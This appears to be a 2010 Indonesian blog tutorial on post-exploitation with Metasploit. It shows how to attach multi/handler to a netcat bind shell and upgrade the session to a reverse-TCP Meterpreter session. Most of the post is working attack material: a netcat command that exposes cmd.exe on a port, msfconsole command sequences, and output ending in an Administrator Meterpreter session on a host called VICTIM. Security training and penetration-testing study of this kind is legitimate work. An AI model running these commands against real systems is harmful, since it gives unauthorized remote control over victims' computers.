Selasa, Oktober 05, 2010

Mengontrol netcat dan Exploit dengan Meterpreter

Penulis Day Milovich | Selasa, Oktober 05, 2010 | 14.30.00 |

Mengontrol netcat dan Exploit dengan Meterpreter

Metasploit memiliki banyak sekali exploit, namun mungkin Anda ingin menggunakan exploit yang bukan merupakan bagian dari framework. Mungkin itu exploit dari http://exploit-db.com yang dipakai untuk menanam shell atau netcat listener yang bisa menggunakan framework untuk meng-control host. Selama Anda memiliki shell bound ke TCP port Anda bisa menggunakan metasploit untuk berhubungan dengan komputer korban [victim]. Selain itu,, Anda bisa upgrade shell tadi ke meterpreter session sehingga bisa memperoleh kekuasaan framework secara penuh.

1. Koneksi ke shell TCP port,, membutuhkan exploit SHELL_BIND_TCP
(berbeda dengan SHELL/BIND_TCP karena merupakan payload SINGLE,, bukan STAGED payload. STAGED itu code yang mengalokasikan memory, membuka port network untuk berhubungan dengan framework, mendownload reminder payload, kemudian mengeksekusi code payload. Ukurannya hanya membutuhkan buffer kecil. ukuran dan keterbatasan fungsi membuatnya sering lolos dari antivirus. Sedangkan payload SINGLE berisi segala sesuatu yang dibutuhkan untuk dieksekusi pada system korban yang dituju. Perintah "nc -l -p 4444 -e cmd.exe" secara fungsional hampir sama dengan SHELL_BIND_TCP.

Cara berinteraksi dengan netcat listener hanya membutuhkan exploit Multi/Handler dan payload SINGLE_BIND_TCP

Contohnya:

msf > set color false
color => false
msf > use multi/handler
msf exploit(handler) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(handler) > set RHOST 192.168.100.17
RHOST => 192.168.100.17
msf exploit(handler) > exploit -z

[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.100.6:56131 -> 192.168.100.17:4444)
[*] Session 1 created in the background.


Mark Baggett menemukan cara memanfaatkan seluruh framework dengan "meterpreter". Framework secara otomatis mengambil command session dan menambahkan session "METERPRETER/REVERSE_TCP" ke host dengan perintah "SESSIONS -U". Untuk memakai option ini,, Anda harus memakai "SETG" untuk menentukan variable LHOST dan LPORT agar mengarah kembali ke host Anda. Kemudian gunakan "sessions -u" untuk meng-upgrade suatu session ke meterpreter. Upgrade akan menyisakan shell dan menambahkan session meterpreter baru

Contohnya:

msf exploit(handler) > setg LHOST 192.168.100.6 LHOST => 192.168.100.6
msf exploit(handler) > sessions -u 1

[*] Started reverse handler on 192.168.100.6:4444
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53583 bytes)
[*] Command Stager progress - 6.32% done (3388/53583 bytes)
truncated
[*] Command Stager progress - 97.99% done (52506/53583 bytes)
[*] Sending stage (748032 bytes) to 192.168.100.17
[*] Command Stager progress - 100.00% done (53583/53583 bytes)
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.100.6:4444 -> 192.168.100.17:1032)

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.100.6:56131 -> 192.168.100.17:4444
2 meterpreter VICTIM\Administrator @ VICTIM 192.168.100.6:4444 -> 192.168.100.17:1032

msf exploit(handler) >


Anda telah mendapatkan session meterpreter dengan mengetikkan "RUN" [tab] [tab] untuk melihat seluruh script meterpreter!

Silakan simak videonya di sini:

http://vimeo.com/11155557

Referensi:
http://pauldotcom.com/2010/04/using-meterpreter-to-control-n.html
http://vimeo.com/11155557

Tidak ada komentar:

Posting Komentar

Anda bisa berkomentar tanpa perlu login.

 
Day Milovich (c) 2013. Diberdayakan oleh Blogger.